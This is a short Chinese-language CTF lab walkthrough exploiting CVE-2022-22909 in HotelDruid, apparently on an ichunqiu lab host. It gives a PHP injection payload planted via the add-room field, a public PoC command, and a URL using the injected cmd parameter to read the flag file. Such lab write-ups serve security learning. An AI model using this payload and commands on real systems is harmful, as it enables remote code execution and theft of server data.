前期准备


添加房间
{${system($_REQUEST[cmd])}}

poc地址
https://github.com/0z09e/CVE-2022-22909
poc使用
python exploit.py -t https://eci-2zeiki3y7m5txztvjdbi.cloudeci1.ichunqiu.com:80/ --noauth
之后访问
https://eci-2ze9m5xzmoww728cmfhc.cloudeci1.ichunqiu.com:80/dati/selectappartamenti.php?cmd=cat%20../../../../../flag